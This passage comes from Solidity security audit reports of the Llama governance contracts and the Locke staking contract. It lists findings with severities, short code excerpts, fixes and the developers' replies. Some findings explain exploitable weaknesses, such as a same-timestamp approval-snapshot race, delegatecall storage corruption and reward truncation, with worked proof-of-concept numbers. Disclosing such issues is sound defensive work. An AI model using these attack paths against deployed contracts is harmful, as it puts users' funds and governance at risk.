to store approval quantities per timestamp. If the current quantity changes, the previous values are preserved. The block.timestamp of createAction is used as a snapshot for the approval. (See: LlamaCore.sol#L597) Thus, in addition to the Checkpoints, the totalQuantity or numberOfHolders at the createAction are included in the snapshot. However, if new policyholders are added or their quantities change after the createAction within the same block.timestamp, they are not considered in the snapshot but remain eligible to cast an approval. For example, if there are four policyholders together 50% minimum approval: If a new action is created and two policyholders are added subsequently within the same block.timestamp. 9 The numberOfHolders would be 4 in the snapshot instead of 6. All 6 policyholders could participate in the approval, and two approvals would be sufficient instead of 4. Adding new policyholders together with creating a new action could happen easily in a llama script, which allows to bundle different actions. 
If a separate action is used to add a new policyholder, the final execution happens via a publicly callable function. An attacker could exploit this by trying to execute the add-new-policyholder action in the same block.timestamp in which a new action is created.
Recommendation: The correctness of the approval casting mechanism should not be impacted by other actions. A simple solution could be to store, for each role, the timestamp of lastActionCreated. The setRoleHolder function should revert in case lastActionCreated == block.timestamp. It would still be possible to add new policyholders and create an action in the same Llama script; however, it would ensure that policyholders are always added before the action is created.
Llama: Resolved by commit 337672 and commit bee182.
Spearbit: Resolved.

+5.3.5 LlamaCore delegate calls can bring Llama into an unusable state
Severity: Medium Risk
Context: LlamaCore.sol#L337
Description: The core contract in Llama allows the execution of actions through a delegatecall. An action is executed as a delegatecall when the target is added as an authorizedScript. This enables batching multiple tasks into a contract, which can be executed as a single action. In the delegatecall, a script contract could modify arbitrarily any slot of the core contract. The Llama team is aware of this fact and has added an additional safety check to verify whether slot0 has been modified by the delegatecall. Slot0 contains values that should never be allowed to change.

    bytes32 originalStorage = _readSlot0();
    (success, result) = actionInfo.target.delegatecall(actionInfo.data);
    if (originalStorage != _readSlot0()) revert Slot0Changed();

A script might be intended to modify certain storage slots. However, incorrect SSTORE operations can completely break the contract. For example, setting actionsCount = type(uint).max would prevent creating any new actions, and access to funds stored in the Account would be lost.
Recommendation: Users should be aware of the risks associated with using delegatecall in the LlamaCore contract. We acknowledge the benefits of using a delegatecall in certain situations; the risks of errors or malicious code in scripts must be clearly documented, and SSTORE operations in scripts should be reviewed carefully. To further mitigate these risks, the LlamaCore contract could be separated into two individual contracts, so that certain variables cannot be changed at all.
Llama: Resolved by adding LlamaExecutor in commit d0ba59 and PR 298.
Spearbit: Resolved.

+5.3.6 The execution opcode of an action can be changed from call to delegatecall after approval
Severity: Medium Risk
Context: LlamaCore.sol#L309
Description: In Llama, an action only defines the target address and the function which should be called. An action doesn't explicitly define whether the opcode should be a call or a delegatecall; this depends only on whether the target address is added to the authorizedScripts mapping. However, adding a target to authorizedScripts can be done after the approval, in a different action. The authorizedScript action could use a different set of signers with a different approval strategy. Adding a target to authorizedScripts should not impact actions which are already approved and in the queuing state. This could lead to security issues when policyholders approved the action under the assumption that the opcode will be a call instead of a delegatecall.
Recommendation: When policyholders approve or disapprove an action, the execution opcode should already be defined.
It should not be possible for other actions with different signers to indirectly change it without explicitly modifying the current action. Llama: Resolved by commit e2c9ed. Spearbit: Resolved. 5.4 Low Risk +5.4.1 LlamaFactory is governed by Llama itself Severity: Low Risk Context: LlamaFactory.sol#L159 Description: Llama uses their own governance system to govern the LlamaFactory contract. The LlamaFactory contract is responsible for authorizing new LlamaStrategies. We can identify several potential drawbacks with this approach. If only a single strategy contract is used and a critical bug is discovered, the implications could be significant. In such a scenario, a broken strategy contract would need to be used by the Factory governance to deploy a fixed version of the strategy contract or enable other strategies. The likelihood of this happening is still low, but the implications could be critical. Recommendation: Analyze the likelihood of such a scenario. One idea could be to decouple the Factory governance from Llama. This could be achieved by making the Factory Ownable, with ownership optionally set to Llama governance. This would allow using, for example, a Gnosis Safe in the beginning and later migrating, as intended, to Llama governance. Llama: We are confident in the Llama governance system to govern the Llama Factory. Spearbit: Acknowledged. +5.4.2 The permissionId doesn't include call or delegate-call for LlamaAccount.execute Severity: Low Risk Context: LlamaAccount.sol#L236 Description: The decision whether LlamaAccount.execute performs a delegate_call depends on the bool flag parameter withDelegatecall. This parameter is not included in the permissionId, which controls role permissions in Llama. The permissionId in Llama is calculated in the following way: PermissionData memory permission = PermissionData(target, bytes4(data), strategy); bytes32 permissionId = keccak256(abi.encode(permission)); The permissionId required for a role to perform an action only includes the function signature but not the parameters themselves. It is impossible to define the opcode as part of the permissionId. Recommendation: Include the opcode for the execution as part of permissionId, or split LlamaAccount.execute into two separate functions. Another alternative idea could be to use Llama guards for Accounts to verify the opcode. Llama: In practice accounts will likely require more granular control than solely separating the permissions of a call vs. delegatecall from the account. Even an arbitrary call is sufficient to drain an account, so including call vs delegatecall in the permission ID doesn't buy you much security. What's more likely is that each Account will have its own guard, and that guard can have its own permission system with any desired characteristics. Spearbit: Acknowledged. +5.4.3 Nonconforming EIP-712 typehash Severity: Low Risk Context: LlamaCore.sol#L97, LlamaCore.sol#L102 Description: Incorrect strings are used in computing the EIP-712 typehash. 1. The strings contain a space (' ') after each comma (','), which is not standard EIP-712 behaviour. 2. ActionInfo is not used in the typehash. There will be a mismatch when comparing to hashes produced by JS libraries or Solidity (if implemented), etc. Not adhering to the EIP-712 spec means wallets will not render correctly and any supporting tools will produce a different typehash. Recommendation: Remove the spaces after commas and append the ActionInfo struct. Llama: Resolved in commit fbc9b4. Spearbit: Resolved.
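For illustration, a conforming EIP-712 type string has no whitespace after commas and appends the definition of any referenced struct after the outer type (in alphabetical order when several are referenced). The sketch below is hypothetical; the field lists are illustrative assumptions, not Llama's actual struct definitions:

// Hypothetical sketch of a conforming EIP-712 typehash; struct fields
// here are assumptions, not the actual Llama definitions.
bytes32 internal constant CREATE_ACTION_TYPEHASH = keccak256(
    "CreateAction(ActionInfo actionInfo,uint256 nonce)ActionInfo(uint256 id,address creator,uint8 strategyId)"
);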
+5.4.4 Various events do not add the role as parameter Severity: Low Risk Context: LlamaCore.sol#L52-L77 Description: Note: During the audit, the client discovered an issue that affects their offchain infrastructure. Various events do not emit the role as a parameter: 1. event ActionCreated(uint256 id, address indexed creator, ILlamaStrategy indexed strategy, address indexed target, uint256 value, bytes data, string description); 2. event ApprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason); 3. event DisapprovalCast(uint256 id, address indexed policyholder, uint256 quantity, string reason); Recommendation: Consider adding the role as a parameter to the aforementioned events. Llama: Fixed in commit 34e493 and PR 305. Spearbit: Resolved. +5.4.5 LlamaCore doesn't check if minExecutionTime returned by strategy is in the past Severity: Low Risk Context: LlamaCore.sol#L283 Description: The minExecutionTime returned by a strategy is not validated. Recommendation: An additional require(minExecutionTime >= block.timestamp) safety check would provide more protection. The Llama strategies can be seen as somewhat outside of the system, and many new strategies could be added; an additional check would ensure the correct behavior of strategies. Llama: Resolved by commit 312337 and PR 292. Spearbit: Resolved. +5.4.6 Address parsing from tokenId to address string does not account for leading 0s Severity: Low Risk Context: LlamaPolicyMetadata.sol#L37, LlamaPolicyMetadata.sol#L27 Description: Policy tokenIds are derived from the holder's account address. The address is intended to be displayed in the SVG generated when calling tokenURI. Currently, leading 0s are truncated, rendering an incorrect address string: e.g. 0x015b... vs 0x0000...be60 for address 0x0000000000015B23C7e20b0eA5eBd84c39dCbE60. Recommendation: Instead of converting the tokenId from uint256 to a hex string, first cast it to an address and make use of the address-to-hex-string function from LibString: - string memory policyholder = LibString.toHexString(tokenId); + string memory policyholder = LibString.toHexString(address(uint160(tokenId))); Llama: Resolved by commit 0e5654 and PR 295. Spearbit: Resolved. +5.4.7 The ALL_HOLDERS_ROLE can be set as a force role by mistake Severity: Low Risk Context: RelativeStrategy.sol#L141-L145, AbsoluteStrategy.sol#L130-L142 Description: During the initialization, an array of roles that must be assigned force approval/disapproval can be sent. The logic does not account for ALL_HOLDERS_ROLE (which is role id 0, the default value of uint8), which can be sent by mistake by the user. This is a low issue: if the above scenario happens, the strategy can become obsolete, which will require the owner to redeploy the strategy with correct initialization configs. We must mention that the force roles cannot be changed after they are set within the initialization. Recommendation: Consider adding explicit logic for the owner to set ALL_HOLDERS_ROLE (e.g. an array with one role, ALL_HOLDERS_ROLE, must be sent for this functionality to be permitted; otherwise revert in case the array contains a 0). Llama: The ability to set ALL_HOLDERS_ROLE as a force (dis)approval role has been prevented in commit f2cad6 and PR 303. Spearbit: Resolved. +5.4.8 LlamaPolicy.setRolePermission allows to set permissions for non-existing roles Severity: Low Risk Context: LlamaPolicy.sol#L396 Description: It is possible to set a permission for a role that doesn't exist yet.
In other functions, like assigning a role to a policyholder, this check happens. (See: LlamaPolicy.sol#L343) A closely related issue is the updateRoleDescription method, which can emit an event for a role that does not exist. This is just an informational issue, as it does not affect the on-chain logic; it might affect off-chain logic if anything ever relies on it. Recommendation: Add the following check to the function: if (role > numRoles) revert RoleNotInitialized(role); Llama: Resolved by commit 998d14 and PR 299. Spearbit: Resolved. +5.4.9 The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity Severity: Low Risk Context: LlamaPolicy.sol#L393 Description: During the audit, the client discovered an issue that affects their off-chain infrastructure. The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity. From an off-chain perspective, there is currently no way to get the quantity assigned for a role to a policyholder at role-assignment time. The event would be more useful if it emitted quantity instead of currentRoleSupply (since the latter can just be calculated off-chain from the former). Recommendation: Change emit RoleAssigned(policyholder, role, expiration, currentRoleSupply); to emit RoleAssigned(policyholder, role, expiration, quantity); Llama: Fixed in commit de7168 and PR 288. Spearbit: Resolved. +5.4.10 ETH can remain in the contract if msg.value is greater than expected Severity: Low Risk Context: LlamaCore.sol#L297 Description: When an action is created, the creator can specify an amount of ETH that needs to be sent when executing the transaction. This is necessary in order to forward ETH to a target call. Currently, when executing the action, the msg.value is checked to be at least the required amount of ETH needed to be forwarded. if (msg.value < actionInfo.value) revert InsufficientMsgValue(); This can result in ETH remaining in the contract after the execution. From our point of view, LlamaCore should not hold any balance of ETH. Recommendation: Consider changing the check to require equality, or forwarding the whole msg.value to the target. Llama: Fixed in commit 23d376. Spearbit: Resolved. +5.4.11 Cannot re-authorize an unauthorized strategy config Severity: Low Risk Context: LlamaCore.sol#L492 and LlamaCore.sol#L709-L710 Description: Strategies are deployed using a create2 salt. The salt is derived from the strategy config itself (see LlamaCore.sol#L709-L710). This means that any unauthorized strategy cannot be used in the future, even if a user decides to re-enable it. Recommendation: Consider if this is desired behavior. If not, allow re-authorization OR skip the create2 deployment attempt if the strategy address already exists. Llama: Resolved by commit fa7bbf and PR 300. We ended up removing the unauthorizeStrategies method and the concept of authorizing strategies, and went with implicit unauthorization by unassigning all permission IDs using a given strategy. Spearbit: Resolved. +5.4.12 Signed messages may not be cancelled Severity: Low Risk Context: LlamaCore.sol#L143 Description: Creating, approving, and disapproving actions may all be done by signing a message and having another account call the relevant *BySig function. Currently, there is no way for a signed message to be revoked without a successful *BySig function call containing the nonce of the message to be revoked.
Recommendation: Provide a means of incrementing nonces to allow signers to revoke a signed message. Llama: Resolved by commit c7b948 and PR 315. Spearbit: Resolved. +5.4.13 LlamaCore name open to squatting or impersonation Severity: Low Risk Context: LlamaFactory.sol#L137 Description: When deploying a LlamaCore clone, the create2 salt is derived from the name. This means that no two instances may have the same name, and name squatting, or impersonation, may occur. Recommendation: May be handled in the UI by being selective in what names are displayed. Alternatively, a combination of name and salt could be used to form the create2 salt. This would still leave impersonation open but would prevent squatting, as duplicate names would be allowed. Finally, in discussion with the Llama team, a mitigation using msg.sender plus name to create the create2 salt would prevent squatting by allowing duplicate names and tying addresses to the deployer account. Llama: Since the deploy function is governed by Llama, we feel comfortable that we'll have the proper safeguards to prevent this issue. Spearbit: Acknowledged. +5.4.14 Expired policyholders are active until they are explicitly revoked Severity: Low Risk Context: LlamaPolicy.sol#L180 Description: Each policyholder in Llama has an expiration timestamp. However, policyholders can still use the power of their role after the expiration has passed. The final revoke only happens after the public LlamaPolicy.revokeExpiredRole method is called. Anyone can call this method after the expiration timestamp has passed. For the Llama system to function effectively with role expiration, it is essential that external keepers vigilantly monitor the contract and promptly revoke expired roles. A final revoke exactly at the expiration cannot be guaranteed. Recommendation: Consider if this is the desired behavior; if not, consider taking into account the expiration behavior of a role. Llama: We acknowledge this issue as it's a trade-off we are ok with. The definition of a valid role is: • Role had quantity at action creation. • Role may be revokable at action creation, but if not yet revoked, it's still active. Spearbit: Acknowledged. 5.5 Gas Optimization +5.5.1 Gas optimizations Severity: Gas Optimization Context: General Description: Throughout the codebase we've identified gas improvements that were aggregated into one issue for better management. RelativeStrategy.sol#L159 • The if (disapprovalPolicySupply == 0) revert RoleHasZeroSupply(disapprovalRole); check and actionDisapprovalSupply[actionInfo.id] = disapprovalPolicySupply; can be wrapped in an if block in case disapprovals are enabled. • The uint128 newNumberOfHolders; and uint128 newTotalQuantity; variables are obsolete, as the updates on the currentRoleSupply can be done in the if branches. LlamaPolicy.sol#L380-L392 • The exists check is redundant. LlamaPolicy.sol#L252 • The _validateActionInfoHash(action.infoHash, actionInfo); is redundant as it's already done in getActionState. LlamaCore.sol#L292 LlamaCore.sol#L280 LlamaCore.sol#L672 • Finding the BOOTSTRAP_ROLE in LlamaFactory._deploy could happen by expecting the role at a certain position, like position 0, instead of paying gas for an on-chain search operation to iterate the array. LlamaFactory.sol#L205 • The quantityDiff calculation is guaranteed not to overflow, as the ternary checks initialQuantity > quantity before subtracting. • Infeasible for numberOfHolders and totalQuantity to overflow.
See also LlamaPolicy.sol#L422-L423 • Infeasible for numberOfHolders to overflow. • approvalRole can be read from memory instead of reloading from storage. Recommendation: Consider implementing the gas optimizations. Llama: Resolved in PR 284 and commit c0303c. We decided to acknowledge the first issue as it would add too much complexity to the code. Spearbit: Resolved. +5.5.2 Unused code Severity: Gas Optimization Context: Description: Various parts of the code are unused or unnecessary. • CallReverted and MissingAdmin in LlamaPolicy.sol#L27-L29 • DisapprovalThresholdNotMet in RelativeStrategy.sol#L28 • Unused errors in LlamaCore.sol: InvalidCancelation, ProhibitedByActionGuard, ProhibitedByStrategy, ProhibitedByStrategy(bytes32 reason) and RoleHasZeroSupply(uint8 role) • The comment /// - Action creators are not allowed to cast approvals or disapprovals on their own actions, is inaccurate; in this strategy, creators have no restrictions on their own actions. RelativeStrategy.sol#L19 Recommendation: Consider removing the unnecessary code blocks. Llama: Resolved in PR 227 and commit 5071e5. Spearbit: Resolved. +5.5.3 Duplicate storage reads and external calls Severity: Gas Optimization Context: castApproval sequence diagram, createAction sequence diagram Description: When creating, approving, disapproving, queuing, and executing actions, there are calls between the various contracts in the system. Due to the external calls, the compiler will not cache storage reads, meaning the gas cost of warm sloads is incurred multiple times. The same is true for view function calls between the contracts. A number of these calls return the same value multiple times in a transaction. Recommendation: Consider where simple changes can be made to cache reads or avoid duplicate calls. As for entirely eliminating duplicate reads, we agree that there is a trade-off, and saving 100 gas for a warm read may not be worth the added complexity in some areas. Llama: We addressed some of these findings in commit e5d5ee, but in some cases we decided to optimize for readability over optimization. Spearbit: Acknowledged. +5.5.4 Consider clones-with-immutable-args Severity: Gas Optimization Context: LlamaCore.sol#L108-L117, and elsewhere. Description: The cloned contracts have immutable values that are written to storage on initialization due to proxies being used. Reading from storage costs extra gas but also puts some of the storage values at risk of being overwritten when making delegate calls. Recommendation: Consider if clones-with-immutable-args is appropriate for the project. Llama: We chose not to use one of the clones-with-immutable-args implementations because: 1. The contracts are not audited (they have been involved with audits but never directly audited themselves). 2. Infrequent governance actions are typically less gas-sensitive than e.g. critical-path DeFi methods called by every user, which we think makes this change not worth the risk due to (1). Spearbit: Acknowledged. The remaining delegate call risks are discussed in another ticket. +5.5.5 The domainSeperator may be cached Severity: Gas Optimization Context: LlamaCore.sol#L620, LlamaCore.sol#L460, LlamaCore.sol#L403 Description: The domainSeperator is computed on each use. Some gas may be saved by caching it and deferring to the cached value. Recommendation: Consider using one of OpenZeppelin or Solady, which are both project dependencies. Llama: The domain separator would be cached as immutable in the case of using the OpenZeppelin library.
But in Llama's case, all the Llama Cores are minimal proxies, which would each need their own domain separators. Spearbit: Acknowledged. 5.6 Informational +5.6.1 Prefer on-chain SVGs or IPFS links over server links for contractURI Severity: Informational Context: LlamaPolicyMetadata.sol#L97 Description: Llama uses an on-chain SVG for LlamaPolicy.tokenURI. The same could be implemented for LlamaPolicy.contractURI as well. In general, IPFS links or on-chain SVGs for visual representations provide better properties than centralized server links. Recommendation: Change the hardcoded URLs in contractURI to SVGs or an IPFS link. Llama: These images are only used by NFT marketplace frontends and are cached anyway by their CDNs. We lean towards leaving it to preserve the flexibility if the logo changes in the future. Spearbit: Acknowledged. +5.6.2 Consider making the delegate-call script functions only callable by delegate-call Severity: Informational Context: GovernanceScript.sol#L63 Description: An additional safety check could be added to scripts if a function should be only callable via a delegate-call. Recommendation: The following modifier could be added to delegate-call-only script functions: address public immutable SELF; constructor () { SELF = address(this); } modifier onlyDelegateCall { require(address(this) != SELF); _; } Llama: Fixed in commit 5834a2. Spearbit: Resolved. +5.6.3 Missing tests for SingleUseScript.sol Severity: Informational Context: SingleUseScript.sol#L10 Description: There are no tests for SingleUseScript.sol in Llama. Recommendation: Each contract used for Llama should be tested with high coverage. Llama: Fixed in PR 331. Spearbit: Resolved. +5.6.4 Role not available to Guards Severity: Informational Context: Structs.sol#L29-L36, ILlamaStrategy.sol#L14 Description: Use cases where Guards require knowing the creation or approval role for the action are not supported. ActionInfo does reference the strategy, and the two implemented strategies do have public functions referencing the approvalRole, allowing for a workaround. However, this is not mandated by the ILlamaStrategy interface and is not guaranteed to be present in future strategies. Recommendation: Consider exposing the role to guards. Llama: The action creation role was added to the ActionInfo struct in PR 281. If a guard wanted the (dis)approval role it could try querying the strategy (there's no guarantee that the strategy has the approval or disapproval role exposed; however, both strategies currently implemented do). Spearbit: Resolved. +5.6.5 Global guards are not supported Severity: Informational Context: LlamaCore.sol#L146 Description: Other protocols' use of guards applies them to the account (i.e. globally). In other words, if global guards existed and there were some properties known to apply to the entire LlamaCore instance, a global guard could be applied. The current implementation allows granular control, but it also requires granular control, with no ability to set global guards. Recommendation: Note this in the docs and/or consider whether global guards are desirable. Llama: We explicitly avoided global guards to reduce the risk of unintended consequences. If users want to generalize their guards they can accomplish that by using a script as an abstraction layer on administrative functions and guard that script. Spearbit: Acknowledged.
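Tying together the onlyDelegateCall modifier from 5.6.2 and Llama's suggestion above of guarding a script that wraps administrative functions, such a script might look as follows. This is a minimal hypothetical sketch; the contract and function names are assumptions, not part of the Llama codebase:

contract AdminScript {
    address public immutable SELF;

    constructor() {
        SELF = address(this);
    }

    // When invoked via delegatecall, address(this) is the calling core,
    // not the script's own deployment address, so the check passes.
    modifier onlyDelegateCall() {
        require(address(this) != SELF);
        _;
    }

    // Hypothetical batched administrative task; a single guard can then be
    // set on this script function instead of on each underlying function.
    function batchAdminTasks() external onlyDelegateCall {
        // ... administrative calls executed in the core's storage context ...
    }
}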
+5.6.6 Consider using _disableInitializers in constructor Severity: Informational Context: LlamaCore.sol#L152 Description: OpenZeppelin added _disableInitializers() in 4.6.0, which prevents initialization of the implementation contract, and recommends its use. Recommendation: Remove the initializer modifier from the constructor and add _disableInitializers() in the constructor body. Llama: Resolved in commit e3da48 and PR 293. Spearbit: Resolved. +5.6.7 Consider renaming initialAccounts to initialAccountNames for clarity Severity: Informational Context: LlamaCore.sol#L168 Description: Consider renaming initialAccounts to initialAccountNames for clarity. The more verbose argument name makes it clear what to pass as input. Llama: Resolved by commit 5f3d2c and PR 313. Spearbit: Resolved. +5.6.8 Revoking and setting a role edge cases Severity: Informational Context: LlamaPolicy.sol#L158C12-L158C25, LlamaPolicy.sol#L180 Description: This issue highlights a number of edge-case behaviors: 1. Calling setRoleHolder passing in an account with balanceOf == 0, 0 quantity, and 0 expiration results in minting the NFT. 2. Revoking all policies through revokeExpiredRole leaves an address with no roles except for the ALL_HOLDERS_ROLE and a balanceOf == 1. 3. Revoking may be conducted on policies the address does not have (building on the previous scenario): • Alice is given role 1 with expiry. • Expiry passes. • Anyone calls revokeExpiredRole. • Role is revoked but Alice still has balanceOf == 1. • LlamaCore later calls revokePolicy with roles array of [2]. • A role Alice never had is revoked. • The NFT is burned. Recommendation: Document the edge cases and the recommended means of revoking. Llama: Acknowledged 1 & 2 as this is intentional behavior to allow minting an account a policy that only has the ALL_HOLDERS_ROLE, and resolved 3 with commit 68538b and PR 318. Spearbit: Acknowledged. +5.6.9 Use built-in string.concat Severity: Informational Context: LlamaPolicyMetadata.sol#L48, LlamaPolicyMetadata.sol#L63-L66, LlamaPolicyMetadata.sol#L85, LlamaPolicyMetadata.sol#L99-L100 Description: The Solidity version used has a built-in string.concat which can replace the instances of string(abi.encodePacked(...)). The client notes there are no gas implications of this change, while the change does offer semantic clarity. Recommendation: Use the built-in string.concat. Llama: Fixed in commit c305ce. Spearbit: Resolved. +5.6.10 Inconsistencies Severity: Informational Context: Description: Throughout the codebase, we've encountered some inconsistencies that we decided to point out. • for(uint256 i = 0... is not used everywhere, e.g. AbsoluteStrategy.sol#L130 • Sometimes, a returned value is not named. E.g. named return value: function createAction( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, string memory description ) external returns (uint256 actionId) { vs. unnamed return value: function createActionBySig( uint8 role, ILlamaStrategy strategy, address target, uint256 value, bytes calldata data, address policyholder, uint8 v, bytes32 r, bytes32 s ) external returns (uint256) { • Missing NatSpec on various functions, e.g. LlamaPolicy.sol#L102 • _uncheckedIncrement is not used everywhere. • Naming of modifiers: in all contracts the onlyLlama modifier refers only to the llamaCore. The only exception is LlamaPolicyMetadataParamRegistry, which has a modifier with the same name, onlyLlama, that refers to llamaCore and rootLlama.
See LlamaPolicyMetadataParamRegistry.sol#L16 • console.log debug output left in RelativeStrategy. See: RelativeStrategy.sol#L215 • In GovernanceScript.sol, both SetRolePermission and SetRoleHolder mirror structs defined in the shared lib/Structs.sol file. Additionally, some contracts declare their own structs instead of inheriting all structs from lib/Structs.sol: • LlamaAccount • GovernanceScript • LlamaPolicy We recommend removing duplicate structs and, where relevant, continuing to make use of the shared Structs.sol for struct definitions. Recommendation: Consider keeping the code consistent for better readability. Llama: PR 321 fixed this, with the following notes: • We've chosen not to consistently use named or unnamed returns. We think named returns are useful in certain contexts but not always necessary. • We've updated the NatSpec for all contracts in PR 349. • Modifier naming and the leftover console.log statement were addressed in these two PRs respectively: PR 279 and PR 277. • We chose to remove duplicate structs, but only make use of the shared Structs.sol for structs that appear in more than one file in the src directory. For structs that appear in a single file we're ok with declaring them in that file. Spearbit: Resolved. +5.6.11 Policyholders with large quantities may not both create and exercise their large quantity for the same action Severity: Informational Context: AbsoluteStrategy.sol#L178 Description: The AbsoluteStrategy removes the action creator from the set of policyholders who may approve / disapprove an action. This is a departure from how the RelativeStrategy handles action creators. Not permitting action creators to approve / disapprove is simple to reason about when each policyholder has a quantity of 1; creating can even be thought of as an implicit approval and may be factored in when choosing a minApprovals value. However, in scenarios where a policyholder has a large quantity (in effect a large weight to their casted approval), creating an action means they forfeit the use of the vast majority of their quantity for that particular action. Recommendation: For the strategy as is, emphasize the behavior in documentation so that action creators are not surprised by the loss of influence. A code-based solution would be to consider adding a strategy that allows the creator's quantity to count as casting approval. Documenting the difference between a strategy like this and the current AbsoluteStrategy would be important. Finally, without modifications to the codebase, the issue may be circumvented by asking policyholders with large quantities to provide two addresses, one for exercising their large quantity and a second for creating actions. Assigning both addresses the same role, with appropriate quantities, would allow the policyholder to both create an action and exercise their large quantity. Llama: A new strategy has been added called AbsoluteQuorum. The old AbsoluteStrategy has been split into 2 contracts, AbsoluteStrategyBase and PeerReview. Fixed in PR 345. Spearbit: Resolved. +5.6.12 The roleBalanceCheckpoints can run out of gas Severity: Informational Context: LlamaPolicy.sol#L244-L246 Description: The roleBalanceCheckpoints function returns the Checkpoints history of a balance. This call will copy the whole history into memory, which can end up in an out-of-gas error. This is an informational issue, as this function was designed for off-chain usage and the caller can use eth_call with a higher gas limit.
Recommendation: Consider adding a paginated version of this function; furthermore, consider adding an extra function that returns the length of the _checkpoints. Llama: Fixed in commit e055e9 and PR 310. Spearbit: Resolved. +5.6.13 GovernanceScript.revokeExpiredRoles should be avoided in favor of calling LlamaPolicy.revokeExpiredRole from an EOA Severity: Informational Context: GovernanceScript.sol#L211 Description: GovernanceScript.revokeExpiredRoles is intended to be delegate-called from LlamaCore. Given that LlamaPolicy.revokeExpiredRole is already public and without access controls, it will always be cheaper, and less complex, to call it directly from an EOA or to batch it in a multicall, again from an EOA. Recommendation: Prefer calling LlamaPolicy.revokeExpiredRole directly or via multicall over using GovernanceScript.revokeExpiredRoles. Llama: Resolved with commit 2e4de6. Spearbit: Resolved. +5.6.14 The InvalidActionState can be improved Severity: Informational Context: LlamaCore.sol#L281, LlamaCore.sol#L295 Description: Currently, the InvalidActionState error includes the expected state as an argument. This is unnecessary, as the expected state can be derived from the method called; it would make more sense to include the current state instead. Recommendation: Consider adding the current state to the revert error instead of the expected state. Llama: Fixed in commit 5fa77c and PR 311. Spearbit: Resolved. +5.6.15 _uncheckedIncrement function written in multiple contracts Severity: Informational Context: LlamaCore.sol#L771, LlamaFactory.sol#L243, LlamaAccount.sol#L284, LlamaPolicy.sol#L432, RelativeStrategy.sol#L287, AbsoluteStrategy.sol#L285 Description: Multiple contracts make use of an _uncheckedIncrement function, and each duplicates the function definition. Similarly, the slot0 function appears in both LlamaAccount and LlamaCore, and _toUint64 appears in the two strategy contracts plus LlamaCore. Recommendation: Move shared functions to a local lib to DRY out the codebase. Llama: Resolved by commit 0a0aa4. Spearbit: Resolved. diff --git a/findings_newupdate/spearbit/Locke-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Locke-Spearbit-Security-Review.txt new file mode 100644 index 0000000..65be6d5 --- /dev/null +++ b/findings_newupdate/spearbit/Locke-Spearbit-Security-Review.txt @@ -0,0 +1,20 @@ +5.1.1 UnaccruedSeconds do not increase even if nobody is actively staking Severity: High Risk Context: Locke.sol#L180 Description: The unstreamed variable tracks whether someone is staking in the contract or not. However, because of the division precision loss at Locke.sol#L164-L166 and Locke.sol#L187, unstreamed > 0 may happen even when everyone has already withdrawn all deposited tokens from the contract, i.e. ts.token = 0 for everyone. Consider the following proof of concept with only two users, Alice and Bob: • streamDuration = 8888 • At t = startTime, Alice stakes 1052 wei of deposit tokens. • At t = startTime + 99, Bob stakes 6733 wei of deposit tokens. • At t = startTime + 36, both Alice and Bob exit from the contract. At this point Alice's and Bob's ts.tokens are both 0, but unstreamed = 1 wei. The above-mentioned numbers are the result of a fuzzing campaign and were not carefully crafted; therefore this issue can also occur under normal circumstances. function updateStreamInternal() internal { ...
uint256 tdelta = timestamp - lastUpdate; if (tdelta > 0) { if (unstreamed == 0) { unaccruedSeconds += uint32(tdelta); } else { unstreamed -= uint112(tdelta * unstreamed / (endStream - lastUpdate)); } } ... } Recommendation: Consider using totalVirtualBalance == 0 instead of unstreamed == 0. +5.1.2 Old governor can call acceptGov() after renouncing its role through _abdicate() Severity: High Risk Context: Gov.sol#L30 Description: The __abdicate function does not reset the pendingGov value to 0. Therefore, if a pending governor is set, that user can still become governor by calling acceptGov. Recommendation: Consider setting pendingGov to address(0) inside the __abdicate function:
function __abdicate() governed external override {
    address old = gov;
    gov = address(0);
+   pendingGov = address(0);
    emit NewGov(old, address(0));
}
+5.1.3 User can lose their reward due to truncated division Severity: High Risk Context: Locke.sol#L321 Description: The truncated division can cause users to lose rewards in an update round, which may happen when any of the following conditions are true: 1. rewardToken.decimals() is too low. 2. The reward is updated too frequently. 3. streamDuration is too large. 4. totalVirtualBalance is too large (e.g., a stake near the end of the stream). This could potentially happen especially when the 1st case is true. Consider the following scenario: • rewardToken.decimals() = 6. • depositToken.decimals() can be any value (assume it's 18). • rewardTokenAmount = 1K * 10**6. • streamDuration = 1209600 (two weeks). • totalVirtualBalance = streamDuration * depositTokenAmount / timeRemaining, where depositTokenAmount = 100K * 10**18 and timeRemaining = streamDuration (a user stakes 100K at the beginning of the stream). • lastApplicableTime() - lastUpdate = 100 (about 7 blocks' time). Then rewards = 100 * 1000 * 10**6 * 10**18 / 1209600 / (1209600 * 100000 * 10**18 / 1209600) = 0.8267 < 1. The user wants to buy the reward token at the price of 100K/1K = 100 deposit tokens but does not get any because of the truncated division.
function rewardPerToken() public override view returns (uint256) {
    if (totalVirtualBalance == 0) {
        return cumulativeRewardPerToken;
    } else {
        // time*rewardTokensPerSecond*oneDepositToken / totalVirtualBalance
        uint256 rewards;
        unchecked {
            rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * depositDecimalsOne) / streamDuration / totalVirtualBalance;
        }
        return cumulativeRewardPerToken + rewards;
    }
}
Recommendation: Consider scaling up cumulativeRewardPerToken and users' rewards. 5.2 Medium Risk +5.2.1 The streamAmt check may prolong a user in the stream Severity: Medium Risk Context: Locke.sol#L165 Description: Assume that the amount of tokens staked by a user (ts.tokens) is low. This check allows another person to deposit a large stake in order to prolong the user in a stream (until streamAmt for the user becomes non-zero). For this duration the user would be receiving a bad rate, or 0 altogether, for the reward token while being unable to exit from the pool. if (streamAmt == 0) revert ZeroAmount(); Therefore, if Alice stakes a small amount of deposit token and Bob comes along and deposits a very large amount of deposit token, it's in Alice's interest to exit the pool as early as possible, especially when this is an indefinite stream. Otherwise she would be receiving a bad rate for her deposit token.
